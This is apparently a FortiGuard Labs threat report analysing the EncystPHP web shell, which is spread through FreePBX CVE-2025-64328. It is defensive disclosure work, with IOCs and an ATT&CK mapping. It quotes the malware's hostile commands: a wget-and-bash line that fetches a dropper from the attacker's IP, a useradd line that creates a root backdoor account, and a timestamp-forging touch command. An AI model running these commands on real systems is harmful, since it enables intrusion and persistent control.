Unveiling the Weaponized Web Shell EncystPHP | FortiGuard
Labs
By Vincent Li
Published: 2026-01-28 · Archived: 2026-04-02 10:46:39 UTC
Affected Platforms: FreePBX Endpoint Manager v17.0.2.36 – v17.0.3
Impacted Users: Any organization
Impact: Remote attackers gain control of the vulnerable systems
Severity Level: High
FortiGuard Labs has discovered a web shell that we named “EncystPHP.” It features several advanced capabilities,
including remote command execution, persistence mechanisms, and web shell deployment. Incidents were
launched in early December last year and propagated via exploitation of the FreePBX vulnerability CVE-2025-
64328.
Its malicious activity appears to be associated with the hacker group INJ3CTOR3, first identified in 2020, which
targeted CVE-2019-19006. In 2022, the threat actor shifted its focus to the Elastix system via CVE-2021-45461.
These incidents begin with the exploitation of a FreePBX vulnerability, followed by the deployment of a PHP web
shell in the target environments. We assess that this campaign represents recent attack activity and behavior
patterns associated with INJ3CTOR3.
The following section provides an in-depth analysis of the related incidents and the EncystPHP web shell.
Incidents
The web shell was delivered via CVE-2025-64328, a post-authentication command-injection vulnerability in the
administrative interface of the FreePBX Endpoint Manager.
The exploit originated from Brazil and targeted a victim environment managed by an Indian technology company
specializing in cloud solutions, communication services, and IT infrastructure.
https://www.fortinet.com/blog/threat-research/unveiling-the-weaponized-web-shell-encystphp
Page 1 of 16

Figure 1: FreePBX administrative interface
The attackers downloaded the EncystPHP dropper from the IP address 45[.]234[.]176[.]202, which resolves to
the domain crm[.]razatelefonia[.]pro. The associated web page, Raza Telefonia, which appears to be a VoIP
management system, includes a login interface.
Figure 2: EncystPHP attack traffic via CVE-2025-64328
https://www.fortinet.com/blog/threat-research/unveiling-the-weaponized-web-shell-encystphp
Page 2 of 16

Figure 3: Malware download website
When connected to the route new/ on the download source, the request is automatically redirected to another
dropper named k.php.
https://www.fortinet.com/blog/threat-research/unveiling-the-weaponized-web-shell-encystphp
Page 3 of 16

Figure 4: Malware download source redirects to the EncystPHP dropper
Malware Analysis
EncystPHP was initially delivered by exploiting the FreePBX vulnerability CVE-2025-64328. It deployed a web
shell on victim hosts via the file named  "c", which serves as the starting point for the following analysis.
https://www.fortinet.com/blog/threat-research/unveiling-the-weaponized-web-shell-encystphp
Page 4 of 16

Figure 5: The EncystPHP file flow
The dropper first modifies the file permissions of ajax.php and model.php to 000, rendering both files
unreadable, unwritable, and non-executable.
Figure 6: Modifying file permission to 000
EncystPHP then attempts to collect database configuration information from /etc/freepbx.conf and proceeds to
delete cron job entries and multiple FreePBX user accounts, including “ampuser,” “svc_freepbx,” “freepbx_svc,”
“bluej,” “nahda,” “FreePBX_setup,” “emoadmin,” and “nvd0rz.”
Figure 7: Collecting database configurations and deleting commands and users
It then searches for PHP files associated with web shells by identifying content such as Base64 decode functions,
packet headers, or PHP functions that execute shell commands, and deletes all matching files.
Figure 8: Deleting other PHP web shells
EncystPHP also scans for PHP files containing strings such as “Badr,” “b3d0r,” “pastebin,” “yokyok,” or
“bm2cjjnRXac1WW3KT7k6MKTR,” and removes these files. These may be related to older versions of the web
shell itself or other malicious PHP files.
https://www.fortinet.com/blog/threat-research/unveiling-the-weaponized-web-shell-encystphp
Page 5 of 16

Figure 9: Deleting PHP files with specific strings
To facilitate persistent control over the compromised host, the malware creates a root-level user named newfpbx,
resets multiple user account passwords to a single value, and escalates their privileges.
useradd -s /bin/bash  -ou 0 -g 0 -p '$1$faV63BKr$4jH3MqYYmrpM55P.AWD2U1' newfpbx &>/dev/null
Figure 10: Modifying system user with the same password
Follow this behavior, EncystPHP injects the SSH public key and modifies system configurations to ensure that
the default SSH port (22) remains open.
Figure 11: Injecting the SSH public key
Figure 12: Ensuring SSH is always open
It then downloads an additional dropper to support further web shell deployment and persistence.
(setsid wget "hxxp://45[.]234[.]176[.]202/new/k.php" -O /var/spool/asterisk/tmp/serv 2>/dev/null >/dev/null; bash
/var/spool/asterisk/tmp/serv 2>/dev/null > /dev/null & ) 2>&1
Figure 13: Downloading another dropper with Base64-encoded command
https://www.fortinet.com/blog/threat-research/unveiling-the-weaponized-web-shell-encystphp
Page 6 of 16

At the final stage of the c dropper execution, EncystPHP tampers with log files and deletes the FreePBX
Endpoint Manager module named endpoint. After completing these actions, it restores file permissions on
FreePBX-related files and reloads the configuration to avoid a service exception.
Figure 14: Erasing traces and removing the endpoint
The c dropper then deploys a Base64-encoded web shell and downloads another dropper, named k.php. The
k.php dropper performs similar actions, including deploying a Base64-encoded web shell, installing configuration
components, and establishing persistence mechanisms.
Web Shell
The payload is delivered in Base64-encoded format and decoded at runtime by the dropper component. The
decoded PHP web shell is written to disk, masquerading as a legitimate FreePBX file named ajax.php, allowing it
to blend into the application structure.
Figure 15: Base64-encoded web shell
Authentication is performed using a simple verification mechanism in which a plaintext password entered via the
web interface is hashed with MD5 and compared against a hard-coded hash value embedded in the web shell.
https://www.fortinet.com/blog/threat-research/unveiling-the-weaponized-web-shell-encystphp
Page 7 of 16

Figure 16: Web shell authentication verification interface source code
Figure 17: Web shell authentication verification interface
Figure 18: Verifying hard-coded MD5 credentials
Upon successful authentication, the web shell exposes an interactive interface titled Ask Master. This interface
includes multiple predefined operational commands, such as file system enumeration, process inspection,
querying active Asterisk channels, listing Asterisk SIP peers, and retrieving multiple FreePBX and Elastix
configuration files.
https://www.fortinet.com/blog/threat-research/unveiling-the-weaponized-web-shell-encystphp
Page 8 of 16

Figure 19: Web shell interface source code
Figure 20: Web shell interface
By leveraging Elastix and FreePBX administrative contexts, the web shell operates with elevated privileges,
enabling arbitrary command execution on the compromised host and initiating outbound call activity through the
PBX environment.
https://www.fortinet.com/blog/threat-research/unveiling-the-weaponized-web-shell-encystphp
Page 9 of 16

Figure 21: Elastix and FreePBX privilege escalation
Dropper
The file k.php also contains the previously mentioned Base64-encoded web shell. Once executed, it decodes the
payload and writes it to disk as ajax.php, deploying it to multiple locations.
Figure 22: Web shell deployment
The dropper creates several directories under the path /var/www/html/, including digium_phones/, rest_phones/,
digium_phoness/, phones/, fpbxphones/, freepbxphones/, and freepbx/.
It then copies the web shell EncystPHP from /var/www/html/admin/views/ajax.php and
/var/www/html/rest_phones/ajax.php to the file paths listed in the following table. These paths correspond to
commonly accessible web routes, increasing resilience by ensuring that alternative access points remain available
if one instance is removed.
https://www.fortinet.com/blog/threat-research/unveiling-the-weaponized-web-shell-encystphp
Page 10 of 16

/var/www/html/rest_phones/ajax.php
/var/www/html/admin/modules/core/ajax.php
/var/www/html/digium_phones/ajax.php
/var/www/html/admin/assets/js/config.php
/var/www/html/admin/assets/config.php
/var/www/html/admin/assets/ajax.php
/var/www/html/admin/modules/core/ajax.php
/var/www/html/phones/ajax.php
/var/www/html/digium_phoness/ajax.php
/var/www/html/fpbxphones/ajax.php
/var/www/html/freepbxphones/ajax.php
/var/www/html/freepbx/ajax.php
After deploying the web shell, the dropper forges timestamps to match those of legitimate files, reducing the
likelihood of detection during routine inspection.
touch /var/www/html/admin/views/ajax.php -r /var/www/html/admin/views/footer.php
Next, the malware decodes a Base64-encoded configuration file and writes it to
/var/www/html/admin/views/.htaccess. This configuration enables RewriteCond and RewriteRule directives for
URL redirection. The rules first verify that the requested resource is neither a directory, a file, nor a symbolic link.
The final rule specifies that requests beginning with one or more whitespace characters are redirected to
config.php.
https://www.fortinet.com/blog/threat-research/unveiling-the-weaponized-web-shell-encystphp
Page 11 of 16

Figure 23: Configuration of EncystPHP
Finally, the dropper decodes and writes the Base64-encoded shell script to /var/spool/asterisk/tmp/test.sh and
/tmp/test.sh. The script is executed using bash, after which the attack removes the script to eliminate forensic
artifacts.
Figure 24: Base64-encoded persistence shell script
Persistence
The persistence mechanism implemented by EncystPHP consists of four parts. The first establishes persistence
before executing test.sh. In this stage, the dropper c installs multiple crontab entries that download the secondary
dropper k.php every minute, saving it as /var/lib/asterisk/bin/zen2 and /var/lib/asterisk/bin/devnull2.
Figure 25: Initial persistence method in the dropper c
Next, test.sh triggers the second and third persistence stages. It decodes a Base64-encoded file named license.php
and writes it to /var/www/html/admin/modules/freepbx_ha/. This file subsequently downloads two droppers, c and
k.php, and installs additional crontab entries.
https://www.fortinet.com/blog/threat-research/unveiling-the-weaponized-web-shell-encystphp
Page 12 of 16

Figure 26: Persistence shell script “test.sh”
The third stage periodically downloads the dropper k.php and saves it as /var/lib/asterisk/bin/devnull every three
minutes. It then echoes the rm command three times without executing it, creating the appearance that
EncystPHP has been removed from the system.
Figure 27: Cron tab command in "test.sh"
The fourth persistence stage is executed via license.php. It downloads the dropper k.php as
/var/lib/asterisk/bin/devnull2, and the dropper c as /var/lib/asterisk/bin/devnull23 and /trmp/devnull24 at one-minute intervals. In addition to maintaining persistence, this stage disables error reporting, executes EncystPHP,
and removes log artifacts to hinder detection.
https://www.fortinet.com/blog/threat-research/unveiling-the-weaponized-web-shell-encystphp
Page 13 of 16

Figure 28: Persistence PHP file license.php
Conclusion
This incident demonstrates how CVE-2025-64328 can be exploited to deploy stealthy, persistent web shells, such
as EncystPHP, in FreePBX environments, underscoring that unpatched PBX systems remain high-value targets.
Although the attack techniques are not entirely new, the observed behavior reflects an active and ongoing threat
that closely mirrors historical INJ3CTOR3 campaigns while adapting to current operational contexts.
Because it can blend into legitimate FreePBX and Elastix components, such activity may evade immediate
detection, leaving affected systems exposed to well-known risks, including long-term persistence, unauthorized
administrative access, and abuse of telephony resources. Organizations should treat any successful exploitation of
this vulnerability as a full compromise and prioritize immediate remediation, monitoring, and security hardening
to mitigate further impact.
Fortinet Protections
The malware described in this report is detected and blocked by FortiGuard Antivirus as:
PHP/EncystPHP.A!tr
BASH/EncystPHP.A!tr
The FortiGuard AntiVirus service engine is integrated into FortiGate, FortiMail, FortiClient, and FortiEDR.
Customers running these products with up-to-date signatures are protected against the malware components
described in this report.
The FortiGuard Web Filtering Service blocks the C2 server.
FortiGuard Labs provides an IPS signature against attacks exploiting the following vulnerabilities:
https://www.fortinet.com/blog/threat-research/unveiling-the-weaponized-web-shell-encystphp
Page 14 of 16

CVE-2025-64328: 59448 FreePBX.Administration.GUI.filestore.Command.Injection
Organizations seeking to strengthen foundational security awareness may also consider completing Fortinet
Certified Fundamentals (FCF) training in Cybersecurity.  This module is designed to help end users learn how to
identify and protect themselves from phishing attacks.
The FortiGuard IP Reputation and Anti-Botnet Security Service proactively blocks infrastructure associated with
this campaign by correlating malicious IP intelligence collected from Fortinet’s global sensor network, CERT
collaborations, MITRE, trusted industry partners, and other intelligence sources.
If you believe this or any other cybersecurity threat has impacted your organization, contact our Global
FortiGuard Incident Response Team for assistance.
IOCs
URLs
hxxp://45[.]234[.]176[.]202/new/c
hxxp://45[.]234[.]176[.]202/new/k.php
Hosts
45[.]234[.]176[.]202
187[.]108[.]1[.]130
Files
71d94479d58c32d5618ca1e2329d8fa62f930e0612eb108ba3298441c6ba0302
7e3a47e3c6b82eb02f6f1e4be6b8de4762194868a8de8fc9103302af7915c574
fc514c45fa8e3a49f003eae4e0c8b6a523409b8341503b529c85ffe396bb74f2
285fac34a5ffdac7cb047d412862e1ca5e091e70c0ac0383b71159fdd0d20bb2
29d74963f99563e711e5db39261df759f76da6893f3ca71a4704b9ee2b26b8c7
MITRE ATT&CK Mapping for EncystPHP Campaign
Tactic
Technique
ID
Technique Name Observed Activity in EncystPHP
Initial Access T1190
Exploit Public-Facing
Application
Exploitation of FreePBX Endpoint Manager
via CVE-2025-64328 to execute post-authentication command injection
Execution T1059.004
Command and Scripting
Interpreter: Unix Shell
Execution of Bash commands via injected
payloads and downloaded shell scripts
https://www.fortinet.com/blog/threat-research/unveiling-the-weaponized-web-shell-encystphp
Page 15 of 16

Persistence T1053.003
Scheduled Task/Job:
Cron
Multiple crontab entries installed to
repeatedly download and execute droppers
Persistence T1505.003
Server Software
Component: Web Shell
Deployment of EncystPHP masquerading as
legitimate FreePBX PHP files (ajax.php,
config.php)
Privilege
Escalation
T1068
Exploitation for Privilege
Escalation
Abuse of FreePBX administrative context to
execute commands with elevated privileges
Privilege
Escalation
T1136.001
Create Account: Local
Account
Creation of a root-level user account
(newfpbx) with UID 0
Credential
Access
T1003 OS Credential Dumping
Collection of database credentials from
/etc/freepbx.conf
Defense
Evasion
T1070.004
Indicator Removal on
Host: File Deletion
Deletion of logs, cron artifacts, and FreePBX
Endpoint Manager module
Defense
Evasion
T1222.002
File and Directory
Permissions
Modification: Linux
Modification of file permissions to 000 to
block access and disrupt inspection
Defense
Evasion
T1036.005
Masquerading: Match
Legitimate Name or
Location
Web shell written to legitimate FreePBX file
paths with forged timestamps
Defense
Evasion
T1562.001
Impair Defenses: Disable
or Modify Tools
Removal of competing web shells and
disabling error reporting
Lateral
Movement
T1021.004 Remote Services: SSH
Injection of attacker-controlled SSH public
key and forced exposure of port 22
Command
and Control
T1105 Ingress Tool Transfer
Repeated download of droppers (c, k.php)
from attacker-controlled infrastructure
Command
and Control
T1071.001
Application Layer
Protocol: Web Protocols
Use of HTTP for payload delivery and
command execution
Impact T1496 Resource Hijacking
Abuse of PBX resources for unauthorized
telephony operations
Source: https://www.fortinet.com/blog/threat-research/unveiling-the-weaponized-web-shell-encystphp
https://www.fortinet.com/blog/threat-research/unveiling-the-weaponized-web-shell-encystphp
Page 16 of 16